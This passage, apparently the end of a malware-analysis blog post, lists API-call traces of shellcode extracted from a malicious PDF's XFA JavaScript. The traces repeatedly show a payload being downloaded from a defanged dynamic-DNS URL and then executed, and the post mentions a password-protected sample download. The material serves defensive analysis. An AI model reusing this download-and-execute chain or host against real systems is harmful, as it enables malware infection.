kernel32.VirtualAlloc()
kernel32.VirtualAlloc()
ntdll.swprintf()
kernel32.LoadLibraryA(lpFileName=urlmon)
urlmon.URLDownloadToCacheFileW(szUrl=hxxp://zzrnneaejhi[.]ddns[.]name/b6noxa1/?23ed7cc71ce4e972574b005f0558510201075d5f0301530c070257520e5b5a07;1;3)
kernel32.GetVersion()
advapi32.OpenProcessToken()
shell32.ShellExecuteExW()
kernel32.LoadLibraryA(lpFileName=urlmon)
urlmon.URLDownloadToCacheFileW(szUrl=hxxp://zzrnneaejhi[.]ddns[.]name/b6noxa1/?23ed7cc71ce4e972574b005f0558510201075d5f0301530c070257520e5b5a07;1;3)
ntdll.NtTerminateThread()
For Windows XP and earlier, the net result is the same, there are just different DLL functions called.kernel32.VirtualAlloc()
ntdll.swprintf()
kernel32.LoadLibraryA(lpFileName=urlmon)
urlmon.URLDownloadToCacheFileW(szUrl=hxxp://zzrnneaejhi[.]ddns[.]name/b6noxa1/?23ed7cc71ce4e972574b005f0558510201075d5f0301530c070257520e5b5a07;1;3)
kernel32.GetVersion()
advapi32.OpenProcessToken()
shell32.ShellExecuteExW()
kernel32.LoadLibraryA(lpFileName=urlmon)
urlmon.URLDownloadToCacheFileW(szUrl=hxxp://zzrnneaejhi[.]ddns[.]name/b6noxa1/?23ed7cc71ce4e972574b005f0558510201075d5f0301530c070257520e5b5a07;1;3)
ntdll.NtTerminateThread()
kernel32.VirtualAlloc()
kernel32.VirtualAlloc()
ntdll.swprintf()
kernel32.LoadLibraryA(lpFileName=urlmon)
urlmon.URLDownloadToCacheFileW(szUrl=hxxp://zzrnneaejhi[.]ddns[.]name/b6noxa1/?23ed7cc71ce4e972574b005f0558510201075d5f0301530c070257520e5b5a07;1;3)
kernel32.GetVersion()
kernel32.CreateProcessW()
kernel32.LoadLibraryA(lpFileName=urlmon)
urlmon.URLDownloadToCacheFileW(szUrl=hxxp://zzrnneaejhi[.]ddns[.]name/b6noxa1/?23ed7cc71ce4e972574b005f0558510201075d5f0301530c070257520e5b5a07;1;3)
ntdll.NtTerminateThread()
kernel32.VirtualAlloc()
ntdll.swprintf()
kernel32.LoadLibraryA(lpFileName=urlmon)
urlmon.URLDownloadToCacheFileW(szUrl=hxxp://zzrnneaejhi[.]ddns[.]name/b6noxa1/?23ed7cc71ce4e972574b005f0558510201075d5f0301530c070257520e5b5a07;1;3)
kernel32.GetVersion()
kernel32.CreateProcessW()
kernel32.LoadLibraryA(lpFileName=urlmon)
urlmon.URLDownloadToCacheFileW(szUrl=hxxp://zzrnneaejhi[.]ddns[.]name/b6noxa1/?23ed7cc71ce4e972574b005f0558510201075d5f0301530c070257520e5b5a07;1;3)
ntdll.NtTerminateThread()
This analysis was possible because of the changes we made in pdf.py in jsunpack. We added support for detecting XFA objects and then parsing the XML data to extract the JavaScript and the rawValue data associated with it. Again, these modifications have been shared back to the jsunpack project.
Post written by David Dorsey of Visiblerisk, Inc.
We’ve had a couple request for the PDF sample. It can be found here. The password to the zipfile is “infected”, remember it’s malware.
沒有留言:
張貼留言